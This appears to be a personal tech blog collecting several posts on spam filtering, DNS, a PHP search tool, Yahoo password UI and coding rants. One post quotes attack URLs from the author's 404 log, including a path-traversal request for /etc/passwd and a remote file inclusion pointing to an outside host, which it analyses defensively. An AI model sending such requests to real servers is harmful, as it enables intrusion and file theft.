Ramblings of Narc

Just took these pictures outside my window an hour or so ago:

UPDATE: I took a bunch of photos from the set and managed to make a panoramic pic:

Every blogger has done a post like this. You know them, you love them, they are… the silly Google search queries people use to find your blog!

These are in reverse order of arrival, and the URLs are mostly pasted straight out of the referrer log. Without further ado:

• narc ftp port (Google UK) — I’m not sure I really want to know. Do I have an FTP daemon I’m not aware of? If so, it’s probably stuck inside the LAN, since I’m not forwarding anything unexpected.
• what a narc does to set up people — Did you really think it would be that easy? Us narcs have our professional pride, you know?
• acronym for narcs (Google Australia) — Do we really need an acronym here? “Narc” is a pretty short word already. What would be the acronym? “N”?
• zap+ro (Google Thailand) — I’d really prefer if you didn’t, thank you. I happen to live here in .ro, and I like it.
• pl poke data narc (Google UK) — Er… I don’t think I really want to know what that’s supposed to mean. Using Perl to poke data into my brain? No, thank you. Although, if you manage it, that’ll be a neat hack.
• short summary of the notebook — Before I did that search, I hadn’t known The Notebook (2004) was a movie (and a novel, apparently). So here’s a short summary, then: “It’s a movie (and a book).” Happy?
• why is vodafone website so shit? (Google UK) — Good question! Without knowing anything about their internal organization, I’d guess that most of it was their use of a very crappy technology (JavaServer Pages? That’s what the JSP stands for, yes?), which presumably was chosen because the rest weren’t Enterprise-y enough and/or because that’s what the consultants they hired to do the job “knew”.
• mysql “add a fucking user” — This search actually returns a very specific result from my blog, that being my “Going Insane From Work” post, which unfortunately, doesn’t actually answer the (implied) question. So, here it is: to “add a fucking user” to mysql, the command is: GRANT <privileges> ON <database>.<table> TO '<username>'@'<host>' [IDENTIFIED BY '<password>]. Alternatively, to leave the user at default privileges (that is, none), use: CREATE USER '<username>'@'<host> [IDENTIFIED BY '<password>']. This, and more, can be found in the fucking MySQL manual, which you should’ve picked up like the rest of us do.
• arguments against alcoholics anonymous — Er… why? Oh! Oh! I got one: “I’m not a drunk, I can quit whenever I like!” There’s your argument.
• Finally, i didn’t know my friend was a narc — Well, neither did I. Which poses an interesting question: if neither of us knew, are you really my friend?

That’s it for this edition of “Silly Google Phrases”. One thing I’d like to mention, though — a lot of people have been finding my website by searching google for… narc.ro. I find this very curious, but ultimately, as long as people find what they’re looking for, who am I to judge?

Thank you all, and good night!

So if you’re a visitor here who’s ever at least thought of posting a comment, you’ll probably know I recently (about half a year ago?) switched away from Akismet to reCAPTCHA for my spam-blocking needs. ReCAPTCHA is nice, and the fact that they also make it possible for humans to help where OCR fails is a big bonus for them.

However, the fact that it’s one of the most common types of CAPTCHA means that it’s also the one under the heaviest attack, and that means there are spambots that have learned how to crack it.

As evidence of this, I offer the (dozens of) spam comments I just deleted from my queue (as I was typing this, another one just showed up). The major difference between this spam and the stuff that used to pass through Akismet is the length — these new spam comments are very long. This works in my favour, of course, since it makes it easy to figure out what to delete: if it takes a tap of the Page Down key to get to the end of the comment, it’s very likely spam.

However, if we disregard the content of the spam (which is easily changeable), we can see that it’s really quite a bad idea to rely on any kind of CAPTCHA by itself. It seems I have to echo the many others who have said that spam is a machine-generated problem with only human solutions.

Ultimately, every kind of anti-spam solution has drawbacks:

• statistical analysis solutions (think Bayesian filters) will have false positives and false negatives sometimes.
• distributed blacklists (like Akismet) fail because they’re blacklists — and enumerating badness is a failure waiting to happen[1]. On top of that, open blacklists are easy to poison, leading to… false positives, of course.
• CAPTCHAs, as a special class of solutions, fail because they rely on computers not being able to “read” as well as humans can — the problem being that some humans cannot read as well as a computer can; and also that computers are getting smarter all the time.

I’m sure there are other types of anti-spam solutions I haven’t enumerated, and likely they all fail on one point or another.

One of the best approaches to such problems is a whitelist-based approach, or enumerating goodness. This is much easier to do, since the number of honest commenters is likely much lower and much more stable than the number of potential spammers out there.

“But wait, narc, doesn’t that mean that I have to keep an eye on my moderation queue, to whitelist the allowed commenters?” Well, obviously, but you’d have to keep an eye there anyway to check for false positives, and to delete all the spam you’re getting. So there are no savings either way.

With that said, using a solution like reCAPTCHA can reduce the immense size of the moderation queue, which is a good enough reason to use it. But you still need to keep your eye on the ball, and you also shouldn’t forget that CAPTCHAs will keep out parts of your (potential) audience. I try to do that, and if I ever seem to have failed, I strongly encourage you to contact me and remind me.

Update: I’ve had to close comments on this post due to the fact that it got targeted by a bunch of spammers (who don’t seem to have much trouble with the reCAPTCHA). Meh.

Inspired by Jon Eveland‘s qqint, I’ve produced (from scratch) a personal version written in PHP and using an SQLite backend that anyone can set up and use themselves.

I started by putting up some slightly rambly QQSearch documentation that should explain what’s what, and why. Because the docs came first, they may be slightly out of date. They are also slightly ahead of the current state of development, as aliases have not yet been implemented (though it should be reasonably easy to do so).

You can use a demo of QQSearch with the really dangerous bits removed (i.e. no adding and deleting URL mappings).

If you like that, you can go ahead and:

• download QQSearch v. 0.1 as .tar.gz (about 100 KB), or
• download QQSearch v. 0.1 as .zip (about 300 KB)

Short instructions for use: download, extract to the htdocs folder of a PHP-enabled (version 5.1 minimum!) webserver, and browse to it.

If you need more help than that, feel free to contact me and I’ll do my best to get you sorted.

So, I must be the last person on the Internet to have heard of webmin — or, at least, the last person who administers a bunch of Linuxen to do so.

After installing it yesterday on Bast, I discovered, among other things, that webmin has a neat little interface to configure BIND. Since that was basically the one thing I hated having to manage on my own, I decided I’d give it a try — and boy, did it ever work nicely. I’ve managed to transfer the narc.ro zone from the shitty MS server to a nice, neat little BIND9-managed zone on bast.

On top of that, I’ve finally segregated *.narc.ro and *.internal.narc.ro, which makes the DNS a lot cleaner.

In other recent news, however, I did a stupid (this is where the “oopsies” part of the title comes in): I had to change Themis’s IP from 192.168.0.1 to .100 (well, I didn’t have to, I was just lazy), and… I forgot to change the port forward for the DNS. Which ended up breaking my e-mail deliveries, as well as most of everything else related to narc.ro, I’m sure. Luckily, since I also had a reason to change that forward, I caught it relatively quickly (yeah, it only took a couple of days, heh).

So if you were wondering why you couldn’t reach narc.ro, or why your RSS reader was having trouble getting updates, now you know. Aren’t ya glad?

Here’s a neat question for you: what do you think the most traded media on the Internet is?

Is it:

1. Feature-length movies?
2. Music?
3. TV Series?
4. Video Games?
5. None of the above?

As it turns out, the answer is (e) None of the above. “The Internet is for porn” is not just a catchy show-tune. Note that I’m not referring to the most bandwidth consumed, the honor of which goes to spam — I’m referring to actual, user-shared, P2P trafficked media.

So if that’s true, then we can start to look at the RIAA/MPAA’s claims that “The Internet/downloads are destroying the [music/movie] industry”. By this statement, it should be impossible to make any money selling porn on the Internet, right?

…Yeah, and if you believe that, I’ve got a bridge to sell ya. I don’t believe I’ve mentioned this before here on the blog, but I work with porn every day as part of my regular job, and let me tell you: the only time the signups stop is when someone does something stupid to break them. Otherwise, they just keep coming.

So if free porn didn’t kill the pornography industry, what makes the *AA think that free music/movies are going to kill their respective industries? Perhaps they’re hiding some feelings of inadequacy?

(or, having fun with a public-facing Internet presence)

So, since I upgraded the main narc.ro site, I got a custom 404 handler in the bargain — one that emails me whenever it’s hit. Okay, so it initially sent 500 Internal Server Error, but I’ve fixed that part.

Anyway, the result of this is that I get a whole bunch of very fun emails when people try to hit pages on narc.ro that don’t exist, such as:

• http://www.narc.ro//gazelle/?template=../../../../../../../../../../../../../etc/passwd%00
• http://86.104.40.152/roundcube//bin/msgimport
• http://www.narc.ro/gazelle/?template=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f

I hope I don’t have to tell you not to visit those links — they don’t do anything (except email me, which is annoying).

I’m particularly interested in the first on that list, which is also the most recent. The theoretical narc.ro/gazelle path would have been /opt/www/vhosts/www.narc.ro/htdocs/gazelle. Let’s count the ../es in the path our attacker tried — 13 of them. More than enough to get out of the 6-level deep path and into /. And I probably don’t have to tell you that /etc/passwd is a file you really want to guard pretty well — it has all your users in it (/etc/shadow has the hashed passwords, too, but that one’s protected so an ordinary user (or the apache user) would be unable to read it).

So, what protected me, in this case? Firstly, it was the fortunate fact that the script the attacker was trying to hit doesn’t exist; and second, that wherever I have scripts that are able to take user input for a path (for instance, img.narc.ro works like that), I’ve been careful to put in protection against relative path inputs like that one. http://img.narc.ro/../ just won’t work.

This is a semi-adequate level of protection for me, since I write my own scripts — I don’t have to worry about any mistakes made by anyone other than myself, and I’m pretty careful around this stuff.

But note that I am some random corner of the Internet almost nobody knows about, and I’m still getting attacked. That means no matter who you are, if you’re serving Web content, you must take precautions. And even if you’re the only developer on the system, you should still do your best to contain the threat. Defense in depth should be your key phrase. That’s why I’m currently looking into mod_chroot for my Apache2 installation. Your solution may be different, but have one, or at the very least, be aware that you will be attacked, and have some plan to recover from that if, or when, an attack is successful.

I feel a bit like I’m picking on a retarded kid, but I’ve been asked for instructions about changing one’s password on a Yahoo! account, and I figured that was a good excuse to analyze some of the pitfalls of bad UI. Having just tried to find it myself, I have to say it’s not very easily discoverable unless you know what to look for, and that’s pretty hard for a non-programmer.

First, a caveat: I’ve only tried to do this in the context of accessing Yahoo! Mail. It’s possible that other Yahoo! applications make this process a bit easier, but I’m going to assume the person who needs this (friend of my uncle’s, I’ve never met her) is a typical user who doesn’t care about anything other than Yahoo! Messenger and Mail.

With that said, let’s see how to do it:

First, go to http://mail.yahoo.com/ — the easiest way to get straight to Yahoo! mail:

If you don’t have automatic login enabled, you will probably have to sign in now:

In the above picture, note the “Forget your ID or password?” link that can help you if you can’t remember those.

And now we get to the really bad UI: Yahoo! Mail “non-classic” (click for bigger screenshot):

I know, that’s not the whole UI, I’ve cropped a lot of it out, but the interesting part is in there. See what I’ve highlighted there:

When you click it, this is what you see:

Now, you have to figure out that the “Edit My Account” link is likely to have the password-changing option (maybe not that huge a logic leap — I’m not a user, I don’t know how they think). It’s right there:

The result? Erm, you’ll have to enter your password again:

This helps, I’m sure (for instance, if you have auto-login enabled and some idiot goes to Yahoo! Mail on your behalf, at least they can’t change your password, right? But they can read your mail, and send mail as you. Oops.

On the other hand, the profile edit page appears to contain more sensitive information, such as home address, telephone numbers, and such. It would probably also contain credit card information, which is definitely something we don’t want an unauthorized prankster to see.

So, anyway, the result is you’ll be presented with this screen (click for bigger screenshot):

Which, among other things, contains this:

That’s right, there’s the Change Password link. It didn’t take long to get here, did it? Click it, and you get this:

After you fill out this rather standard password change form, you should be looking at this:

That’s it! Now, let’s see how much it took to get here:

• Two password prompts (one of which might not show up in some cases)
• Figuring out a UI element is actually a menu, and that it’s the one we want!
• Understanding that editing “my account” includes changing the password (as I said, maybe not so much of a logic leap)

The conclusion? It’s not too bad, but it could be better. I’d love to see this action — changing one’s password — be somewhat more easily discoverable without having to browse through a drop-down menu, but otherwise it’s pretty understandable once you spend a few minutes thinking about it.

And there’s the rub: you have to think about it. And it’s not in the obvious place, either — there’s an “Options” menu you might think was related, but it actually refers solely to the Yahoo! Mail options. I have no doubt a lot of people get hung up on this point: “I’ve looked everywhere and I can’t find it”. The profile menu is hidden away in the top-left corner next to the logo, and it looks like a greeting, rather than something with which to get stuff done. Further, there are so few options in that menu that they could all be shown directly below, like the “Sign Out” link is, and that might help a bit.

Alternatively, maybe the drop-down menu could be called “Profile Options” or “My Profile” or something, rather than “Hi, <first name>!”. That makes it look like website fluff rather than like an actually useful piece of user interface.

Oh, in case you’re wondering — I’ve removed my details from the screenshots mostly for clarity, rather than out of any fear of giving away any information. My “About Narc” page contains the personal info I’m okay with having out in the open, and you’ll probably note it’s pretty complete. I’m not that bothered by having random people know my personal information — I assume nobody really cares.

I was just reading a post from Alex_Boly’s blog, and found this brilliant explanation of what programming common sense actually is:

[Common] sense is a very elusive concept. How do you express it, how do you explain it to those people violating it in such an unimaginable manner? How can they learn it, use it, teach others? How did you get into its possession?

Hard questions, with no answer. Until now, when I have finally developed a theory of common sense. It may be proven right or wrong, but at least it’s a theory that is, I believe, worth exploring.

My theory can be summarized as following:

1. We start learning programming because we are attracted by it
2. We continue to learn and read more and more because it’s more and more interesting
3. The knowledge pieces we gather connect to each other
4. The connections solidify in patterns
5. The patterns become the second nature and the common sense is born

You can read the rest of Alex_Boly’s theory on common sense at his blog. It’s very much worth it.

Okay, so, if you’re a subscriber to this blog’s RSS feed, I apologize from the bottom of my heart. Having taken the time to subscribe and read that feed, I have come to the conclusion that it is absolute, unfettered crap. It’s severely incomplete, obviously generated automatically, and ends up cutting a HUGE amount of the original post off, in spite of the fact that I specifically asked WordPress to include the complete article in its generated feeds!

Unfortunately, there didn’t seem to be any solution (other than, probably, getting a plugin to do the right thing instead). Until I looked closer…

Compare this:

Fig. 1: Ramblings of Narc RSS feed sample

To this:

Fig. 2: Ramblings of Narc Atom feed sample

That’s right, the atom feed is much, much better. Like, infinitely better. So much better, in fact, that it’s now the only feed I’m advertising for this blog. If there is demand, I will probably throw the Atom feed through FeedBurner and point people to that, but until then, the Atom feed, which rocks immensely, is king.

I posted a “dent” (God, is that a silly name or what?) recently on identi.ca about how I hate not being able to tell visited links from fresh ones. And then I had a look at this blog and realized it had the exact problem I was ranting about.

The reason for this is that I got this theme from elsewhere, and never really cared enough to look at it very closely.

But, if there’s anything that can get me out of my usual lazy stupor, it’s being (or being called) a hypocrite, so I’ve set out to fix my most obvious failing.

So I’ve added a:visited CSS selectors to all the important places I could find here, on the Ramblings of Narc, and the final result is reasonable, as far as I’m concerned.

As a result, I can now whine all I want about websites that don’t make any obvious visual distinction between visited and unvisited links. But wait, there’s more — I also have a (decent) solution, in the form of a bookmarklet I picked up a long while ago called “zap”. To use it for yourself, all you need to do is drag and drop Zap to your bookmarks toolbar. You can even click it for a live preview.

Oh, the wonders of Javascript bookmarks

Update: Oops, the wonders of Javascript bookmarks, indeed. Somewhere along the way I think WordPress probably mangled it. That’s what I get for not testing carefully enough. Use this link to get to it, instead.

Here’s one that should be entertaining — a listing of all the acronyms I come across on a daily basis, along with my opinion (or other tidbits) on them:

• PHP — originally “Personal Home Page”, now the recursive acronym: “PHP: Hypertext Pre-processor”. Not too painful to use, given the alternatives.
• PERL — “Practical Extraction and Report Language”. AcronymFinder also lists “Pathologically Eclectic Rubbish Lister”, which is reasonably accurate, from my experience with it.
• SQL — “Structured Query Language”. Not “Standard”. Unfortunately.
• SSH — “Secure SHell”. Uses SSL (see below). Very solid and reliable, in my experience.
• SSL — “Secure Sockets Layer”. A technology for implementing mostly-transparent secure data transfer.
• HTTP — “HyperText Transfer Protocol”. Stateless, Simple, and Stupid. Also, very useful.
• HTTPS — either “HTTP, Secure”, or “HTTP over SSL” (which, IMO, should be HTTP/SSL), depending on who you believe. See also HTTP, SSL (above).
• SFTP — “Secure File Transfer Protocol” (not to be confused with FTPS, which is actually FTP/SSL, and doesn’t have much traction in the real world), a service provided by (Open)SSH servers in addition to the shell service.
• AIM — “AOL Instant Messenger”. Crappy software, but with a third-party client like Pidgin is actually reasonable. See also AOL (below).
• AOL — “America OnLine”. Shitty company, well known for being asshole-ish towards its customers (known internally as “members”).
• Y!M — “Yahoo! Messenger”. Semi-crappy messenger service. Reasonably functional, though, and quite stable.
• GTalk — “Google Talk”. Another messenger service, this one built on Jabber/XMPP (see below) and made by Google, the “Don’t be evil” company. Not too evil.
• XMPP — “eXtensible Messaging and Presence Protocol”. An open standard for exchanging (instant) messages over an XML-like protocol. Speaking of which:
• XML — “eXtensible Markup Language”. I just love these X-acronyms, they always make me feel like I’m living in the future.
• IRC — “Internet Relay Chat”. Yes, people still use it. Some pretty awesome people, in some cases, as it turns out.
• APT — “Advanced Packaging Tool”. So far, the best package management tool I’ve seen. However, my experience is limited, so a grain of salt is recommended.
• PTS — “Pseudo-Terminal Slave”. What your SSH session spawns into: a terminal with no associated hardware (virtual or otherwise).

There are probably more I’ve missed, but these will do for the time being. How about you? What are the interesting/important acronyms that you work with every day?

First off, apologies for the graphics-intensive post, but the subject matter demands it.

I’ve seen various pictures of desktops on the Internet, and they usually tend to be cluttered with a bunch of icons, sometimes clustered in such a way as to suggest organization, sometimes not so much.

What I haven’t really seen (well, I haven’t looked very much, either) is what I have:

Presenting… the icon-less desktop!

I assume that makes you think I use the start menu a lot? Far from it, my friend. I happen to consider the Start Menu “no man’s land”, for “those few brave souls who’ve dared to enter it… have never come back”. Instead, what I have is…

The auto-hiding Quick Launch (and more) toolbar. The icons up there are the tools I tend to use the most, though not in that order (or any order, really). The very important ones (for work) are Cygwin (for starting vpnc), PuTTY, and WinSCP. There’s also a Komodo Edit icon, but I don’t really use it — it’s my default editor, anyway, so who needs the extra link?

Because it’s the Quick Launch bar, most installers ask if I want an icon there, so it gets mostly the same type of mileage as the Desktop would. But wait, what’s that over to the right? Could it be…?

That’s right, it’s the Desktop. Now cleanly organized in menu/drawer-like fashion, it still has all those other links I might need once in a while (like, a My Computer to right-click), and can also be used to drag the icons from those applications whose installers don’t ask if you want an icon on the QuickLaunch bar.

There’s one minor problem, though — with this setup, the Recycle Bin tends to try to open automatically if you hover your mouse over it. And if it’s full of a whole lot of stuff, that’ll take a while. Plus, you don’t really see it, do you? Thus, that “Special” folder, er, “on” the Desktop.

It’s the source of a toolbar that sits right next to the Start button (didn’t notice it, did ya?) that contains only a shortcut to the Recycle Bin. So you can see it when it’s full, and can right-click, Empty away.

There’s also a pretty direct mapping between the Games folder and the Games toolbar/menu, but I suspect that’s obvious.

What I love about this is the fact that there are no desktop icons. I rarely see the desktop, anyway (outside of the times when I’m taking screenshots of it, of course), so it’s useless to keep anything there. And the background picture doesn’t get all cluttered up, either. What do you think?

I’ve just had the immense pleasure of reading a bunch of code written by someone who is, or should be, a non-programmer.

Among other things, this piece of code (written in PHP) tends to take very roundabout routes to get where it’s going, its functions are mixed up with program logic (including such things as if(condition) function something() {};, which hurts my brain just thinking about it), and calls a Perl script to do something that’s eminently simple to do in PHP — querying a URL.

Thanks to an unattributed image found on Jeff Atwood’s blog, I can now express what the person writing this code should have been seeing as he wrote it:

Because that’s what was happening in my brain as I was reading it.

Now, I can appreciate code reuse, and the fact that the Perl script this one is calling is written mostly by myself gives me a nice ego-boost, but I’m questioning the validity of the current approach.

Firstly, what’s the point of having someone who is so obviously not a programmer write a bunch of code when I and my co-workers are generally available throughout the entire Toronto workday?

Secondly, does anyone doubt that this piece of code will end up having to be supported by us, the same people who should’ve been asked to write it in the first place? As evidence of this, I present the fact that I was the one asked to “fix it”. All I know is, at some point, I’m going to end up having to do some more in-depth maintenance on this code, and I’ll end up rewriting the whole thing, top to bottom. It’s just that bad.

And don’t even get me started on the excess trailing whitespace I just removed by saving the file. Or the shitty indentation that’s sometimes done with spaces, and other times with Tab. And even when done with spaces, it’s inconsistent between two spaces, three spaces and four.

I just noticed another thing: it calls mysql_free_result() at the very end of the application. How clever! It’s as if the “programmer” didn’t realize it would be done automatically the moment the script ended execution.

I’m also curious if the person who wrote this, ostensibly someone with the username “tony”, can even speak English. The reason I’m asking is this comment here: “Retrive Form Value and Assosate Vlaue for Xsell ID”.

Fun stuff, isn’t it?

You’ve probably seen it — heck, you’ve probably done it yourself, many times. Almost everywhere you go online, if comments are available, or if there’s any kind of open forum, you will see these posts:

this is my opinion: i think [X] should be [Y], [Z]

Now, I’m very specifically not trying to draw attention to the content of the post, because some number of them are very decent, and the rest are mostly ignorable. No, what I’m specifically looking at is the writer’s apparent hatred for the Shift key on his keyboard. With the exception of the [X], [Y] and [Z] I used as placeholders, that post has no uppercase characters whatsoever.

So, my question is, why? Usually, the answer I get is “its extra effort to use the shit^Hft key, and im too lazy”. I don’t buy that. I’m possibly the laziest person I know, and to me, it’s harder not to use the Shift key. It actually takes more mental effort to write like that than it does to write with proper capitalization, punctuation, and spelling (typos notwithstanding). And I’m sure my readers (all two of you) appreciate it.

So why do we see so little capitalization? What is the hatred for the Shift key? Are we moving towards an e. e. cummings-style Internet, where the Shift key is banned, or limited only to articles on media websites like CNN.com? Same for the apostrophe, and (in extreme cases), the period. What’s going on here?